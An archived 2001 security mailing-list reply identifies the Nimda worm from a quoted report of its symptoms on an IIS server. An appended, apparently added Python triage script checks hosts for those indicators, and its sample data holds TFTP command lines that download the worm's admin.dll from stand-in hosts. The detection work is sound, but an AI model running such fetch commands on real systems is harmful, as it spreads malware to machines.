 
From: Gambler (Gambler@cyberlawenforcement.com)
Date: Tue Sep 18 2001 - 17:55:00 CDT


    TO UNSUBSCRIBE: email "unsubscribe issforum" in the body of your message to
    majordomo@iss.net Contact issforum-owner@iss.net for help with any problems!
    ----------------------------------------------------------------------------

    The virus is called W32.Nimda.A@mm; the URL for it at Symantec is
    http://www.symantec.com/avcenter/venc/data/w32.nimda.amm.html

    Gambler
    Director of Internet Security
    Cyberangels.org and CyberLawEnforcement.com

    At 12:07 PM 9/18/2001, Roy Wilkinson wrote:

    >
    >Hi Everyone,
    >
    >This is not exactly an ISS product-related question, so I apologize in
    >advance if this is out of the scope of the forum. However, I was wondering
    >if any of you had encountered a virus with the following characteristics (or
    >similar), and, if so, if you know of a fix. This was reported to me as
    >appearing on a Windows 2000 machine, running IIS, today.
    >
    >The virus apparently:
    >
    > - Creates a file "admin.dll" in the root directory
    > - Makes Registry changes to add or attach this "admin.dll" to Explorer,
    >such that it runs automatically
    > - Adds the Guest account to the Administrators group
    > - Starts up multiple TFTP processes (to several sites) in the background
    > - Creates files named "tftp#", also in the root directory
    > - Maybe more?
    >
    >I have not been able to find anything about this via McAfee,
    >Symantec/Norton, CAI, F-Secure, Kaspersky or Sophos. Cheyenne's A/V product
    >also did not catch it. It has some similarities to Code Blue, so it may be
    >a variant - who knows? Any information would be helpful.
    >
    >Thanks in advance!
    >
    >Roy Wilkinson
    >Manager of Security
    >WebTone Technologies
    >Phone & Fax: (404) 439-8238
    >Visit our website! http://www.webtonetech.com
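As an added example (not code from either poster or the list), here is a small triage routine that checks facts collected from a Windows host against the indicators Roy listed: admin.dll and "tftp#" files in the root, a registry value pointing Explorer at admin.dll, Guest in Administrators, and several concurrent tftp.exe processes. The HostSnapshot structure and the sample data are assumptions constructed for this example.

```python
import re
from dataclasses import dataclass

# Indicators taken from Roy Wilkinson's report in the thread; the sample
# host data below is constructed, not captured from a real machine.
ROOT_FILE_PATTERNS = [
    re.compile(r"^admin\.dll$", re.IGNORECASE),   # "admin.dll" in the root directory
    re.compile(r"^tftp\d+$", re.IGNORECASE),      # files named "tftp#" in the root
]

@dataclass
class HostSnapshot:
    """Facts gathered from one Windows host (hypothetical structure)."""
    root_files: list            # file names in the system drive root
    administrators: list        # members of the local Administrators group
    processes: list             # (image name, command line) pairs
    explorer_registry: dict     # Explorer-related registry values (name -> data)

def triage(snap: HostSnapshot) -> list:
    """Return the matched indicators; an empty list means nothing matched."""
    findings = []
    for name in snap.root_files:
        if any(p.match(name) for p in ROOT_FILE_PATTERNS):
            findings.append(f"suspicious root file: {name}")
    for value, data in snap.explorer_registry.items():
        if "admin.dll" in data.lower():
            findings.append(f"registry value {value} references admin.dll")
    if any(u.lower() == "guest" for u in snap.administrators):
        findings.append("Guest account is a member of Administrators")
    tftp = [cmd for image, cmd in snap.processes if image.lower() == "tftp.exe"]
    if len(tftp) > 1:
        findings.append(f"{len(tftp)} concurrent tftp.exe processes")
    return findings

# Constructed snapshot of an infected-looking host (TEST-NET addresses).
SAMPLE = HostSnapshot(
    root_files=["boot.ini", "pagefile.sys", "admin.dll", "tftp2504", "tftp1130"],
    administrators=["Administrator", "Guest"],
    processes=[
        ("inetinfo.exe", "inetinfo.exe"),
        ("tftp.exe", "tftp -i 192.0.2.10 GET admin.dll"),
        ("tftp.exe", "tftp -i 192.0.2.11 GET admin.dll"),
    ],
    explorer_registry={"ExampleLoadValue": "c:\\admin.dll"},  # constructed value name
)

if __name__ == "__main__":
    for line in triage(SAMPLE):
        print(line)
```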